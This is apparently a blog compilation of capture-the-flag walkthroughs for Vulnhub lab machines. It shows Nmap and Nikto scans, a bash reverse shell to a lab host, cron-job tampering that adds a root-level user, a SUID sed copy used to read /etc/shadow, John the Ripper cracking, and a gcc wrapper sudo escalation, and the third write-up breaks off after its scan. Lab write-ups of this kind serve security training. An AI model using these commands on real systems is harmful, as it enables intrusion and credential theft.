Methodology :

Network Scanning

• Netdiscover
• Nmap

Enumeration

• Nikto
• Netcat payload

Privilege Escalation

• sudo-l
• crontab
• setuid
• password cracking
• normal guessing

NETWORK SCANNING:

We start with obtaining the IP address of the machine. So I used netdiscover for the scanning. And my IP is: 192.168.2.10

#netdiscover -i vboxnet0
Currently scanning: 192.168.17.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
_____________________________________________________________________________
IP At        MAC Address      Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.2.2  08:00:27:df:0c:9c 1     42 PCS Systemtechnik GmbH
192.168.2.10 08:00:27:50:8c:dd 1     60 PCS Systemtechnik GmbH

We are scanning our local network. And for that, we are using the Nmap ping scan.

nmap -A -sS -p- -O 192.168.2.10
Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-22 01:37 IST
Nmap scan report for 192.168.2.10
Host is up (0.00056s latency).
Not shown: 65526 filtered ports
PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:16:10:91:bd:d7:6c:06:df:a2:b9:b5:b9:3b:dd:b6 (RSA)
|   256 0e:a4:c9:fc:de:53:f6:1d:de:a9:de:e4:21:34:7d:1a (ECDSA)
|_  256 ec:27:1e:42:65:1c:4a:3b:93:1c:a1:75:be:00:22:0d (ED25519)
80/tcp    open   http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry 
|_/phpbash.php
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Check your Privilege
111/tcp   open   rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
875/tcp   closed unknown
2049/tcp  open   nfs_acl 3 (RPC #100227)
20048/tcp open   mountd  1-3 (RPC #100005)
42955/tcp closed unknown
46666/tcp closed unknown
54302/tcp closed unknown
MAC Address: 08:00:27:50:8C:DD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9

So far so good. We gat a port 80. So let get enumerating it more.

Enumeration

And I open the target IP address our browser. As we see an image file

So I open the next page /phpbash.php because we see the file in Nmap output robots.txt file. As disallow entry here we see a bash terminal.

So I run the id command and we see an output apache group name.

And now without wasting our time. I create an oneliner bash reverse shell and start our Netcat payload listener port 1505. So that I can get the shell.

bash -i >& /dev/tcp/192.168.2.1/1505 0>&1 

#nc -nlvp 1505
listening on [any] 1505 ...
connect to [192.168.2.1] from (UNKNOWN) [192.168.2.10] 51562
bash: no job control in this shell
bash-4.2$ id 
id 
uid=48(apache) gid=48(apache) groups=48(apache)
bash-4.2$ hostname
hostname
my_privilege
bash-4.2$ uname -a
uname -a
Linux my_privilege 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

We get a shell.

Privilege Escalation

On the further enumerating the user home directory and we can see a user armour. And on armour user home directory we find a credentials.txt file. So I am using the cat command to open the file and we see a message my password is md5 (rootroot1).

bash-4.2$ cd /home
bash-4.2$ ls
armour
bash-4.2$ cd armour
bash-4.2$ ls
Credentials.txt  backup.sh  runme.sh
bash-4.2$ ls -lha
total 24K
drwxrwxrwx  3 armour armour 121 Mar 21 07:59 .
drwxr-xr-x. 3 root   root    19 Apr 11  2018 ..
-rwxrwxrwx  1 armour armour 123 Mar 19 08:19 .bash_history
-rwxrwxrwx  1 armour armour  27 Mar 17 10:34 .bashrc
drwxrwxrwx  3 armour armour  18 Mar 17 10:27 .local
-rwxrwxrwx  1 root   armour 603 Mar 17 10:30 .viminfo
-rw-r--r--  1 armour armour  30 Mar 21 07:59 Credentials.txt
-rwxrwxrwx  1 root   root    17 Mar 17 09:48 backup.sh
-rwxrwxrwx  1 root   root     8 Mar 17 10:55 runme.sh
bash-4.2$ cat Credentials.txt 
my password is
md5(rootroot1) >>> b7bc8489abe360486b4b19dbc242e885
bash-4.2$

So I am changing our user to armour using SU ( Switch User ) command and we successfully changed our user.

bash-4.2$ su armour
su armour
Password: b7bc8489abe360486b4b19dbc242e885

[armour@my_privilege html]$ id 
id 
uid=1000(armour) gid=1000(armour) groups=1000(armour),31(exim)
[armour@my_privilege html]$ hostname
hostname
my_privilege
[armour@my_privilege html]$

Now there are many ways to get escalated

METHOD 1: SUDO-L

So sudo -l prints the commands which we are allowed to run as SUDO. And if the attacker can’t directly get root access via any other technique. So he might try to compromise any of the users who have SUDO access.

[armour@my_privilege html]$ sudo -l
Matching Defaults entries for armour on my_privilege:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", env_keep+=LD_PRELOAD,
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User armour may run the following commands on my_privilege:
    (ALL : ALL) NOPASSWD: /bin/sh, /bin/bash, /usr/bin/sh, /usr/bin/bash,/bin/tcsh, /bin/csh, /bin/ksh, /bin/rksh, /bin/zsh, /usr/bin/fish,
        /bin/dash, /usr/bin/tmux, /usr/bin/rsh, /bin/rc, /usr/bin/rc,/usr/bin/rssh, /usr/bin/scponly, /bin/scponly, /usr/bin/rootsh,
        /usr/bin/shc, /usr/bin/shtool, /usr/bin/targetcli, /usr/bin/nano,/usr/bin/rnano, /usr/bin/awk, /usr/bin/dgawk, /usr/bin/gawk,
        /usr/bin/igawk, /usr/bin/pgawk, /usr/bin/curl, /bin/ed, /bin/red,/usr/bin/env, /usr/bin/cat, /usr/bin/chcon, /usr/bin/chgrp,
        /usr/bin/chmod, /usr/bin/chown, /usr/bin/cp, /usr/bin/cut, /usr/bin/dd,/usr/bin/head, /usr/bin/ln, /usr/bin/mv, /usr/bin/nice, /usr/bin/tail,
        /usr/bin/uniq, /usr/bin/ftp, /usr/bin/pftp, /usr/bin/zip,/usr/bin/zipcloak, /usr/bin/zipnote, /usr/bin/zipsplit,
        /usr/bin/funzip, /usr/bin/unzip, /usr/bin/unzipsfx, /usr/bin/zipgrep,/usr/bin/zipinfo, /usr/bin/7za, /usr/bin/socat, /usr/bin/php,
        /usr/bin/git, /usr/bin/rvim, /usr/bin/rvim, /usr/bin/vim,usr/bin/vimdiff, /usr/bin/vimtutor, /usr/bin/vi, /bin/sed,
        /usr/bin/qalc, /usr/bin/e3, /usr/bin/dex, /usr/bin/elinks,/usr/bin/scp, /usr/bin/sftp, /usr/bin/ssh, /usr/bin/gtar, /usr/bin/tar,
        /usr/bin/rpm, /usr/bin/up2date, /usr/bin/yum, /usr/bin/expect,/usr/bin/find, /usr/bin/less, /usr/bin/more, /usr/bin/perl,
        /usr/bin/python, /usr/bin/man, /usr/bin/tclsh, /usr/bin/script,/usr/bin/nmap, /usr/bin/nmap, /usr/bin/aria2c, /usr/sbin/arp,
        /usr/bin/base64, /usr/bin/busybox, /usr/bin/cpan, /usr/bin/cpulimit,/usr/bin/crontab, /usr/bin/date, /usr/bin/diff, /usr/bin/dmesg,
        /usr/sbin/dmsetup, /usr/bin/dnf, /usr/bin/docker,/usr/bin/easy_install, /usr/bin/emacs, /usr/bin/expand,
        /usr/bin/facter, /usr/bin/file, /usr/bin/finger, /usr/bin/flock,/usr/bin/fmt, /usr/bin/fold, /usr/bin/gdb, /usr/bin/gimp,
        /usr/bin/grep, /usr/bin/head, /usr/sbin/iftop, /usr/bin/ionice,/usr/sbin/ip, /usr/bin/irb, /usr/bin/jjs, /usr/bin/journalctl,
        /usr/bin/jq, /usr/sbin/ldconfig, /usr/sbin/logsave, /usr/bin/ltrace,/usr/bin/lua, /usr/bin/mail, /usr/bin/make, /usr/bin/mawk,
        /usr/bin/mount, /usr/sbin/mtr, /usr/bin/mysql, /usr/bin/nawk,/usr/bin/ncat, /usr/bin/nl, /usr/bin/node, /usr/bin/od,
        /usr/bin/openssl, /usr/bin/perl, /usr/bin/pic, /usr/bin/pip,/usr/bin/puppet, /usr/bin/readelf, /usr/bin/red, /usr/bin/rlwrap,
        /usr/bin/rpmquery, /usr/bin/rsync, /usr/bin/ruby, /usr/bin/run-parts,/usr/bin/screen, /usr/bin/sed, /usr/sbin/service, /usr/bin/setarch,
        /usr/bin/sftp, /usr/bin/shuf, /usr/bin/smbclient, /usr/bin/socat,/usr/bin/sort, /usr/bin/sqlite3, /usr/bin/stdbuf, /usr/bin/strace,
        /usr/bin/systemctl, /usr/bin/taskset, /usr/bin/tclsh,/usr/sbin/tcpdump, /usr/bin/tee, /usr/bin/telnet, /usr/bin/tftp,
        /usr/bin/time, /usr/bin/timeout, /usr/bin/top, /usr/bin/ul,/usr/bin/unexpand, /usr/bin/unshare, /usr/bin/watch, /usr/bin/wget,
        /usr/bin/xargs, /usr/bin/xxd, /script/test.sh, /script/test.py,/sbin/httpd, /usr/sbin/setcap, /usr/sbin/getcap, /usr/local/bin/ht,
        /bin/timedatectl, /home/armour/ai, /usr/bin/user_hello

[armour@my_privilege html]$ sudo /bin/bash
sudo /bin/bash
[root@my_privilege html]# id
id
uid=0(root) gid=0(root) groups=0(root)

[armour@my_privilege html]$ sudo /usr/bin/user_hello 
root
[armour@my_privilege html]$ vim /usr/bin/user_hello 
[armour@my_privilege html]$ cat /usr/bin/user_hello 
#!/bin/bash
bash -i
[armour@my_privilege html]$ sudo /usr/bin/us
user_hello   users        usleep       usx2yloader  
[armour@my_privilege html]$ sudo /usr/bin/user_hello 
[root@my_privilege html]# id 
uid=0(root) gid=0(root) groups=0(root)

METHOD 2: CRONTAB

Corn jobs generally run with root privileges. And if we can successfully tamper any script or binary which are defined in the corn jobs. So then we can easily execute arbitrary code with root privilege.

[armour@my_privilege tmp]$ cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/home/armour

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
  *  *  *  *  * root backup.sh
  *  *  *  *  * root run.sh
  *  *  *  *  * root /opt/my_script.sh
  *  *  *  *  * root /opt/my_backup.sh
  0  0  1  1  * root /opt/new_year.sh
  *  *  *  *  * root /usr/bin/bash /script/*.sh
  *  *  *  *  * root /usr/bin/tar czf /backup/armour/`date "+\%F-\%H-\%M"`.tar.gz /home/armour/*
[armour@my_privilege tmp]$ cd 
[armour@my_privilege ~]$ ls -lh 
total 12K
-rw-r--r-- 1 armour armour 30 Mar 21 07:59 Credentials.txt
-rwxrwxrwx 1 root   root   63 Apr  3 06:57 backup.sh
-rwxrwxrwx 1 root   root    8 Mar 17 10:55 runme.sh
[armour@my_privilege ~]$ vim backup.sh 
[armour@my_privilege ~]$ openssl passwd 123       
lp7umJWRYHRcM
[armour@my_privilege ~]$ vim backup.sh 
[armour@my_privilege ~]$ cat backup.sh 
#!/bin/bash
/usr/sbin/useradd dasagreeva -u 0 -o -p lp7umJWRYHRcM
[armour@my_privilege ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
armour:x:1000:1000::/home/armour:/bin/bash
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nginx:x:995:990:Nginx web server:/opt/rh/nginx16/root/var/lib/nginx:/sbin/nologin
mysql:x:994:989:MySQL server:/var/lib/mysql:/bin/bash
exim:x:31:31:Exim Daemon:/dev/null:/bin/false
dasagreeva:x:0:1001::/home/dasagreeva:/bin/bash
[armour@my_privilege ~]$ su dasagreeva
Password: 
[root@my_privilege armour]# id
uid=0(root) gid=1001(dasagreeva) groups=1001(dasagreeva)

METHOD 3:Exploiting SUID Executables

SUID which stands for set user ID is a Linux feature that allows users to execute a file with the permissions of a specified user. UID is a feature that, when used properly, actually enhances Linux security. The problem is that administrators may unknowingly introduce dangerous SUID configurations when they install third-party applications or make logical configuration changes.

[armour@my_privilege html]$ find / -perm -u=s -type f 2>/dev/null 
/var/www/html/awk
/var/www/html/sed
/usr/bin/sed
/usr/bin/curl
/usr/bin/pic
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/rpm
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/python2.7
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/shc
/usr/bin/shtool
/usr/bin/targetcli
/usr/bin/rlwrap
/usr/bin/scponly
/usr/bin/qalc
/usr/bin/irb
/usr/bin/tclsh8.5
/usr/bin/expect
/usr/bin/zipcloak
/usr/bin/zipnote
/usr/bin/zipsplit
/usr/bin/funzip
/usr/bin/unzipsfx
/usr/bin/zipgrep
/usr/bin/zipinfo
/usr/bin/jq
/usr/bin/ltrace
/usr/bin/mailx
/usr/bin/busybox
/usr/bin/mawk
/usr/bin/cpulimit
/usr/bin/puppet
/usr/bin/smbclient
/usr/bin/strace
/usr/bin/user_hello
/usr/bin/fusermount
/usr/sbin/ldconfig
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/arp
/usr/sbin/dmsetup
/usr/sbin/service
/usr/sbin/usernetctl
/usr/sbin/iftop
/usr/sbin/exim-4.84-3
/usr/sbin/mtr
/usr/sbin/ifconfig
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/git-core/git-mktag
/usr/libexec/git-core/git-mktree
/usr/libexec/git-core/git-mv
/usr/libexec/git-core/git-name-rev
/usr/libexec/git-core/git-notes
/usr/libexec/git-core/git-pack-objects
/usr/libexec/git-core/git-pack-redundant
/usr/libexec/git-core/git-pack-refs
/usr/libexec/git-core/git-replace
/usr/libexec/git-core/git-patch-id
/usr/libexec/git-core/git-add
/usr/libexec/git-core/git-annotate
/usr/libexec/git-core/git-apply
/usr/libexec/git-core/git-archive
/usr/libexec/git-core/git-bisect--helper
/usr/libexec/git-core/git-blame
/usr/libexec/git-core/git-branch
/usr/libexec/git-core/git-bundle
/usr/libexec/git-core/git-cat-file
/usr/libexec/git-core/git-check-attr
/usr/libexec/git-core/git-check-ignore
/usr/libexec/git-core/git-check-ref-format
/usr/libexec/git-core/git-checkout
/usr/libexec/git-core/git-checkout-index

[armour@my_privilege html]$ sudo sh -c 'cp $(which sed) .; chmod +s ./sed'
[armour@my_privilege html]$ ./sed -e '' "/etc/shadow"
root:$6$lYoxb/H/0LQ5d50Q$mM2ej4Um6zmkg11uszJrBpZo/vI4TT6nEvQnlnI/GlB9otfNIyN9xXfATAxVAUzj4ojTE1pmFbY12NUzw2j/b0:18313:0:99999:7:::
bin:*:16372:0:99999:7:::
daemon:*:16372:0:99999:7:::
adm:*:16372:0:99999:7:::
lp:*:16372:0:99999:7:::
sync:*:16372:0:99999:7:::
shutdown:*:16372:0:99999:7:::
halt:*:16372:0:99999:7:::
mail:*:16372:0:99999:7:::
operator:*:16372:0:99999:7:::
games:*:16372:0:99999:7:::
ftp:*:16372:0:99999:7:::
tcpdump:!!:18319::::::
armour:$6$ibscpEYi$A0bt4lJe4NdD8hqG6KrZs.I7nS6chM1mMP/6LtG/DlMQ30W8aQDSr9uM42jI8bGoEZCWUr87aalTQrkioxxQg/:18340:0:99999:7:::
mysql:!!:18337::::::
exim:!!:18339:0:99999:7:::
dasagreeva:lp7umJWRYHRcM:18355:0:99999:7:::
[armour@my_privilege html]$ 

We can now see the shadow file of the box.

METHOD 4: Password cracking

We are going to crack the password to the root user form shadow file. For that, we must be needing shadow file and passwd file in text form.

#cd emp/
#ls
passwd.txt  shadow.txt
#unshadow passwd.txt shadow.txt > password.txt
#john --wordlist=/usr/share/wordlists/rockyou.txt password.txt
Warning: only loading hashes of type "sha512crypt", but also saw type "descrypt"
Use the "--format=descrypt" option to force loading hashes of that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates left, minimum 8 needed for performance.
rootroot1        (root)
1g 0:00:00:00 DONE (2020-04-22 14:15) 25.00g/s 75.00p/s 150.0c/s 150.0C/s 
Use the "--show" option to display all of the cracked passwords reliably
Session completed

METHOD 5: Guessing

And so the last but not the least password guessing is the one more way to go

bash-4.2$ su root 
su root 
Password: rootroot1
id 
uid=0(root) gid=0(root) groups=0(root)
cd /root
ls 
proof.txt
cat proof.txt
Best of Luck
628435356e49f976bab2c04948d22fe4

The post Escalate My Privileges Vulnhub Walkthrough appeared first on Armour Infosec.

Pentester Methodology

Network Scanning

• Netdiscover
• Nmap

Enumeration

• Nikto
• phpMyAdmin
• John
• SSH

Privilege Escalation

• Sudo -l
• gcc compilation

Network Scanning

We start with Netdiscover  to obtain IP address as followed

#netdiscover -i vboxnet0
	 Currently scanning: 192.168.12.0/16   |   Screen View: Unique Hosts                                                                                                                            
                                                                                                                                                                                                
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.2     08:00:27:a0:51:d5      1      42  PCS Systemtechnik GmbH                                                                                                                       
 192.168.2.17    08:00:27:a7:26:e1      1      60  PCS Systemtechnik GmbH

Got the machine Ip 192.168.2.17 and let us scan the Nmap.

#nmap -p- -A -O 192.168.2.17
Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 18:53 IST
Nmap scan report for 192.168.2.17
Host is up (0.00048s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)
|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)
|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.3.2
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: TEST WORDPRESS – Just another WordPress site
MAC Address: 08:00:27:A7:26:E1 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/9%OT=22%CT=1%CU=44313%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5E8F21EA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Enumeration

On visiting the web page there, we see a WordPress web site. But the WordPress website doesn’t work properly error here so we moved on our next step.

So I fired Nikto and found phpMyAdmin page.

#nikto -h http://192.168.2.17/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.17
+ Target Hostname:    192.168.2.17
+ Target Port:        80
+ Start Time:         2020-04-09 18:55:13 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://127.0.0.1/index.php/wp-json/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ Cookie goto created without the httponly flag
+ Cookie back created without the httponly flag
+ OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A WordPress installation was found.
+ /phpmyadmin/: phpMyAdmin directory found
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: WordPress login found
+ OSVDB-3092: /phpMyAdmin/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time:           2020-04-09 18:56:16 (GMT5.5) (63 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

so I logged in with credentials root: root. it was a success

We successfully login with the root MySQL database then I select the wpdb database on open the wp-user table and we see two user entries Krishna and user1 as shown in the image file.

I copy the users hash and save a text file and crack the hash using the john tool use the following command

john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 1.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
infosec					(?)
Session aborted

john --wordlist=/usr/share/wordlists/rockyou.txt user
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g/s 5444p/s 5444c/s 5444C/s sharpie1..alvina
0g 0:00:00:45 23.36% (ETA: 20:08:02) 0g/s 5109p/s 5109c/s 5109C/s 12062525..109109109
user1					(?)
Session aborted

And we see WordPress hashes is cracked successfully and I try to login ssh using the WordPress credentials and us successful login with ssh Krishna shell. Krishna: infosec

#ssh krishna@192.168.2.17
The authenticity of host '192.168.2.17 (192.168.2.17)' can't be established.
ECDSA key fingerprint is SHA256:L8AFuzt5MRe4jDRpDukvoY4rrvpBMl49RbM0tbVdeVM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.17' (ECDSA) to the list of known hosts.
krishna@192.168.2.17's password: 
krishna@ck05:~$ id 
uid=1001(krishna) gid=1001(krishna) groups=1001(krishna)
krishna@ck05:~$ hostname
ck05
krishna@ck05:~$ whoami 
krishna

Got the Shell

Privilege Escalation

I ran the sudo -l command and I found Krishna has sudo permission to run a bash script as loopspell this script is compiler a #C language file using gcc using this command we privilege escalate this machine.

krishna@ck05:~$ sudo -l
Matching Defaults entries for krishna on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User krishna may run the following commands on ck05:
    (loopspell : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
krishna@ck05:~$ sudo -u loopspell /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
loopspell@ck05:~$ id 
uid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)
loopspell@ck05:~$ hostname
ck05
loopspell@ck05:~$ whoami 
loopspell

The sudo -l command and we see sudoers filer entry /usr/bin/gcc and code_compiler.sh. using sudo I again run the privilege escalation command and we have a root shell target machine

loopspell@ck05:/home$ cd loopspell/
loopspell@ck05:/home/loopspell$ ls 
backup.c  backup.txt  code_compiler.sh	user.txt
loopspell@ck05:/home/loopspell$ cat user.txt 
a4e3fea7510e570f6964899eb764abdc
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo -l
Matching Defaults entries for loopspell on ck05:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User loopspell may run the following commands on ck05:
    (ALL : ALL) /usr/bin/gcc
    (ALL : ALL) NOPASSWD: /home/loopspell/code_compiler.sh
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh 
Code is being compiling ...
gcc: fatal error: no input files
compilation terminated.
You can find your compiled code in /tmp/ directory.
loopspell@ck05:/home/loopspell$ sudo /home/loopspell/code_compiler.sh "-wrapper /bin/bash,-s ."
Code is being compiling ...
root@ck05:/home/loopspell# id 
uid=0(root) gid=0(root) groups=0(root)
root@ck05:/home/loopspell# hostname
ck05
root@ck05:/home/loopspell# whoami
root
root@ck05:/home/loopspell# passwd
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
root@ck05:/home/loopspell# cd 
root@ck05:~# ls
msg.txt
root@ck05:~# cd /root/
root@ck05:/root# ls
root.txt
root@ck05:/root# cat root
cat: root: No such file or directory
root@ck05:/root# cat root.txt 
_________        ___.                 ____  __.      .__       .__     __    _______   .________
\_   ___ \___.__.\_ |__   ___________|    |/ _| ____ |__| ____ |  |___/  |_  \   _  \  |   ____/
/    \  \<   |  | | __ \_/ __ \_  __ \      <  /    \|  |/ ___\|  |  \   __\ /  /_\  \ |____  \ 
\     \___\___  | | \_\ \  ___/|  | \/    |  \|   |  \  / /_/  >   Y  \  |   \  \_/   \/       \
 \______  / ____| |___  /\___  >__|  |____|__ \___|  /__\___  /|___|  /__|    \_____  /______  /
        \/\/          \/     \/              \/    \/  /_____/      \/              \/       \/ 


flag = efa4c284b8e2a15674dfb369384c8bcf

This flag is a proof that you get the root shell.

Tag me on Twitter with @CyberKnight00 
root@ck05:/root# 

Eureka !!!! got root.

The post InfoSecWarrior CTF: 3 Walkthrough appeared first on Armour Infosec.

Methodology applied :

Network Scanning

• netdiscover
• Nmap

Enumeration

• Nmap
• nikto
• msfvenom

Privilege escalation

• JAVA
• sudo -l

Network Scanning

For scanning the network and obtaining the IP address of the box I used netdiscover.  As shown below

#netdiscover -i vboxnet0
	Currently scanning: 192.168.18.0/16   |   Screen View: Unique Hosts                                                                                      
	2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102               
	_____________________________________________________________________________
	  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
	-----------------------------------------------------------------------------
	192.168.2.2     08:00:27:a8:2f:81      1      42  PCS Systemtechnik GmbH      
	192.168.2.15    08:00:27:f7:24:84      1      60  PCS Systemtechnik GmbH

So the IP of the box is 192.168.2.15.  let’s start with Nmap scanning

#nmap -p- -A -O  192.168.2.15
	Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-09 09:52 IST
	Nmap scan report for 192.168.2.15
	Host is up (0.00044s latency).
	Not shown: 65533 filtered ports
